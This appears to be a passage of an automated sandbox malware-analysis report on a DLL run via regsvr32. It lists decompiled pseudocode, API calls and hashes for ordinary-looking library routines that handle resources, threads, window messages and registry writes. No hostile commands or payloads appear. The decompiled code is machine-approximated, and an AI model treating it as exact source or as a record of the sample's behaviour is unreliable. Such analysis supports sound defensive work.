                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 1615547351-0
                                                                                                            • Opcode ID: 43583110e56df0e81e8a923eb45825900272cf618558ac87eaf74387880b7d98
                                                                                                            • Instruction ID: 9a825a0554ffdf54c91d77e2f252a4914c60dad5953363715cdae4c7005f82be
                                                                                                            • Opcode Fuzzy Hash: 43583110e56df0e81e8a923eb45825900272cf618558ac87eaf74387880b7d98
                                                                                                            • Instruction Fuzzy Hash: E0117071604249BFEB01DFA4CC81AAF7BA9FF08391F118529F629CB291D7329E50CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10007DCD Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E10007DCD(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1000EC09(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}
















                                                                                                            0x10007dd0
                                                                                                            0x10007dd1
                                                                                                            0x10007dd4
                                                                                                            0x10007dd6
                                                                                                            0x10007ddd
                                                                                                            0x10007de0
                                                                                                            0x10007de3
                                                                                                            0x10007dea
                                                                                                            0x10007e01
                                                                                                            0x10007e01
                                                                                                            0x10007e08
                                                                                                            0x10007e13
                                                                                                            0x10007e13
                                                                                                            0x10007e17
                                                                                                            0x10007e1a
                                                                                                            0x10007e22
                                                                                                            0x10007e24
                                                                                                            0x10007e33
                                                                                                            0x10007e37
                                                                                                            0x10007e26
                                                                                                            0x10007e26
                                                                                                            0x10007e29
                                                                                                            0x10007e2d
                                                                                                            0x10007e2d
                                                                                                            0x10007e40
                                                                                                            0x10007e4c
                                                                                                            0x10007e4c
                                                                                                            0x10007e40
                                                                                                            0x10007e52
                                                                                                            0x10007e57
                                                                                                            0x10007e57
                                                                                                            0x10007e63

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 10007DF3
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 10007DFB
                                                                                                            • LockResource.KERNEL32(00000000), ref: 10007E0D
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 10007E57
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 96f8b045b6aa7b5d69994283043e0196d0356fc4f28d5547994321b347e98763
                                                                                                            • Instruction ID: 3dc56c73a436512b808f722c38b75c0ae418026c2f8f50a1f0547d44829b82b9
                                                                                                            • Opcode Fuzzy Hash: 96f8b045b6aa7b5d69994283043e0196d0356fc4f28d5547994321b347e98763
                                                                                                            • Instruction Fuzzy Hash: B3119D70902B95EFE710DF61CC88AABB3B8FF08395B218499E84653555E3B8AD40D7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10006279 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10006279(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E1001FBC4(E10032FC2, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E10006D2B(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x1003701c;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E10021041( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1000EC09(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E10004E6E(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E10005EE5(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E1001FC9C(_t51);
			}









                                                                                                            0x10006279
                                                                                                            0x10006279
                                                                                                            0x10006279
                                                                                                            0x10006279
                                                                                                            0x10006280
                                                                                                            0x10006285
                                                                                                            0x10006287
                                                                                                            0x1000628a
                                                                                                            0x10006291
                                                                                                            0x10006294
                                                                                                            0x10006297
                                                                                                            0x1000629d
                                                                                                            0x100062ad
                                                                                                            0x1000629f
                                                                                                            0x100062a2
                                                                                                            0x100062a7
                                                                                                            0x100062a8
                                                                                                            0x100062a8
                                                                                                            0x100062b5
                                                                                                            0x100062b7
                                                                                                            0x100062b9
                                                                                                            0x100062bb
                                                                                                            0x100062bb
                                                                                                            0x100062bb
                                                                                                            0x100062c0
                                                                                                            0x100062c0
                                                                                                            0x100062c3
                                                                                                            0x100062ca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100062cc
                                                                                                            0x100062d5
                                                                                                            0x100062de
                                                                                                            0x100062e1
                                                                                                            0x100062e4
                                                                                                            0x100062e7
                                                                                                            0x100062ea
                                                                                                            0x100062ed
                                                                                                            0x100062f0
                                                                                                            0x100062f3
                                                                                                            0x100062f6
                                                                                                            0x100062fc
                                                                                                            0x100062ff
                                                                                                            0x10006306
                                                                                                            0x1000630d
                                                                                                            0x10006310
                                                                                                            0x10006316
                                                                                                            0x1000631c
                                                                                                            0x10006322
                                                                                                            0x10006325
                                                                                                            0x10006328
                                                                                                            0x1000632e
                                                                                                            0x10006334
                                                                                                            0x10006337
                                                                                                            0x1000633a
                                                                                                            0x1000634b

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10006280
                                                                                                              • Part of subcall function 10006D2B: __EH_prolog3.LIBCMT ref: 10006D32
                                                                                                            • __strdup.LIBCMT ref: 100062A2
                                                                                                            • GetCurrentThread.KERNEL32 ref: 100062CF
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100062D8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                            • String ID:
                                                                                                            • API String ID: 4206445780-0
                                                                                                            • Opcode ID: 4af8da86511d4e5dd4408705f6d44fb27b71cb1393297a7f8bfc0f794a51907c
                                                                                                            • Instruction ID: a861acdeb37d33d153d410a00307fa8db88fca58120f636a03fd206092374481
                                                                                                            • Opcode Fuzzy Hash: 4af8da86511d4e5dd4408705f6d44fb27b71cb1393297a7f8bfc0f794a51907c
                                                                                                            • Instruction Fuzzy Hash: CA218CB4800B50CED721DF6AC58125AFBE8FFA4340F20891FE1AA86622CBB4A541CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000C4FC Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E1000C4FC(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E1000B21C(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E1000BBDF(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E1000B21C(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x10044410;
					E100209E8( &_v20, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, 0, SendMessageA, _t33);
					_t29 = E100105C8(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1000E58E(_t29);
					}
					return E1001FC9C(_t24);
				}
			}












                                                                                                            0x1000c4fc
                                                                                                            0x1000c4fc
                                                                                                            0x1000c4fe
                                                                                                            0x1000c50b
                                                                                                            0x1000c50d
                                                                                                            0x1000c50f
                                                                                                            0x1000c511
                                                                                                            0x1000c511
                                                                                                            0x1000c517
                                                                                                            0x1000c526
                                                                                                            0x1000c533
                                                                                                            0x1000c538
                                                                                                            0x1000c53f
                                                                                                            0x1000c543
                                                                                                            0x1000c551
                                                                                                            0x1000c55e
                                                                                                            0x1000c563
                                                                                                            0x1000c56b
                                                                                                            0x1000c572
                                                                                                            0x1000c572
                                                                                                            0x1000c577
                                                                                                            0x1000c545
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 1000C526
                                                                                                            • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 1000C551
                                                                                                              • Part of subcall function 1000B21C: GetTopWindow.USER32(?), ref: 1000B22A
                                                                                                            • GetCapture.USER32 ref: 1000C563
                                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 1000C572
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CaptureWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 729421689-0
                                                                                                            • Opcode ID: 0651f16ed6b41e0f0b2415e49c480ceeb8609fd727ddfcdb634436d2adc50095
                                                                                                            • Instruction ID: 6be588b9800c4661a8048c77b3f4dc846bf52327d538fd1bacd6bd973810de05
                                                                                                            • Opcode Fuzzy Hash: 0651f16ed6b41e0f0b2415e49c480ceeb8609fd727ddfcdb634436d2adc50095
                                                                                                            • Instruction Fuzzy Hash: CE0184B535061C7FFA216B248CC9FBB36ADEB4C7C9F010534F2419B0A6C6915C405620
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000DA65 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E1000DA65(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_t40 = _a8;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E1000EC09(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}















                                                                                                            0x1000da68
                                                                                                            0x1000da6a
                                                                                                            0x1000da6c
                                                                                                            0x1000da6f
                                                                                                            0x1000da71
                                                                                                            0x1000da73
                                                                                                            0x1000da76
                                                                                                            0x1000daab
                                                                                                            0x1000daad
                                                                                                            0x1000dab0
                                                                                                            0x1000dab7
                                                                                                            0x1000dac9
                                                                                                            0x1000dacc
                                                                                                            0x1000dad1
                                                                                                            0x1000dad1
                                                                                                            0x1000dacc
                                                                                                            0x1000dadb
                                                                                                            0x1000dae5
                                                                                                            0x1000dae5
                                                                                                            0x1000daeb
                                                                                                            0x1000daee
                                                                                                            0x1000daf2
                                                                                                            0x1000daf2
                                                                                                            0x1000da7d
                                                                                                            0x1000da89
                                                                                                            0x1000da91
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000da95
                                                                                                            0x1000da9d
                                                                                                            0x1000daa0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000daa9
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 1000DA89
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1000DA95
                                                                                                            • LockResource.KERNEL32(00000000), ref: 1000DAA3
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1000DAD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: c41de263a0c4a0a2ff3e2e7faac820cf06b0051920168b0b46ae1c13a6c09a32
                                                                                                            • Instruction ID: 4e046e32b577ecbefe1a9e82239a09ae3eb10ed0fe8967592b5f7829ae1b7b8f
                                                                                                            • Opcode Fuzzy Hash: c41de263a0c4a0a2ff3e2e7faac820cf06b0051920168b0b46ae1c13a6c09a32
                                                                                                            • Instruction Fuzzy Hash: 71113A71604214EFEB01DFA5C888AAE7BB9FF0A390F01806AF90697261CB75DD00CF61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010F7E Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E10010F7E(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10045580; // 0x8f64cb61
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E10020F02( &_v24, 0x10, 0x1003809c, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10010F38(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E1001FBB5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}














                                                                                                            0x10010f7e
                                                                                                            0x10010f84
                                                                                                            0x10010f8b
                                                                                                            0x10010f8f
                                                                                                            0x10010f93
                                                                                                            0x10010f9a
                                                                                                            0x10010f9d
                                                                                                            0x10010fdd
                                                                                                            0x10010fee
                                                                                                            0x10010f9f
                                                                                                            0x10010fa5
                                                                                                            0x10010fa9
                                                                                                            0x10010fb7
                                                                                                            0x10010fbe
                                                                                                            0x10010fc0
                                                                                                            0x10010fca
                                                                                                            0x10010fca
                                                                                                            0x10010fa9
                                                                                                            0x10011002

                                                                                                            APIs
                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10010FB7
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 10010FC0
                                                                                                            • _swprintf.LIBCMT ref: 10010FDD
                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10010FEE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 4210924919-0
                                                                                                            • Opcode ID: 75749d2b2382c0398083ba7cb92d29f59f37c4d48f9a02f992366f8d0876f9a2
                                                                                                            • Instruction ID: 3a2604f4cfee837da5f4817c2b18a2a2174cbb3477f90de8d09310f3c9904bd3
                                                                                                            • Opcode Fuzzy Hash: 75749d2b2382c0398083ba7cb92d29f59f37c4d48f9a02f992366f8d0876f9a2
                                                                                                            • Instruction Fuzzy Hash: 5001C07260031AABDB11DF648D86FBF77ACEF48704F400429FA01EB152DBB4E90587A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016DC9 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E10016DC9(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t35;

				_t35 = _a4;
				E1000EC55( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
				if(_a8 != 0) {
					IntersectRect( &_v28, _a8, _t35 - 0x9c);
					EqualRect( &_v28, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v28) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
				}
				if(_v8 != 0) {
					_push(_v12);
					_push(0);
					E1000E519();
				}
				return 0;
			}







                                                                                                            0x10016dd0
                                                                                                            0x10016ddc
                                                                                                            0x10016de5
                                                                                                            0x10016e08
                                                                                                            0x10016e15
                                                                                                            0x10016de7
                                                                                                            0x10016df2
                                                                                                            0x10016df3
                                                                                                            0x10016df4
                                                                                                            0x10016df5
                                                                                                            0x10016df7
                                                                                                            0x10016e27
                                                                                                            0x10016e3c
                                                                                                            0x10016e3c
                                                                                                            0x10016e47
                                                                                                            0x10016e49
                                                                                                            0x10016e4c
                                                                                                            0x10016e4e
                                                                                                            0x10016e4e
                                                                                                            0x10016e56

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
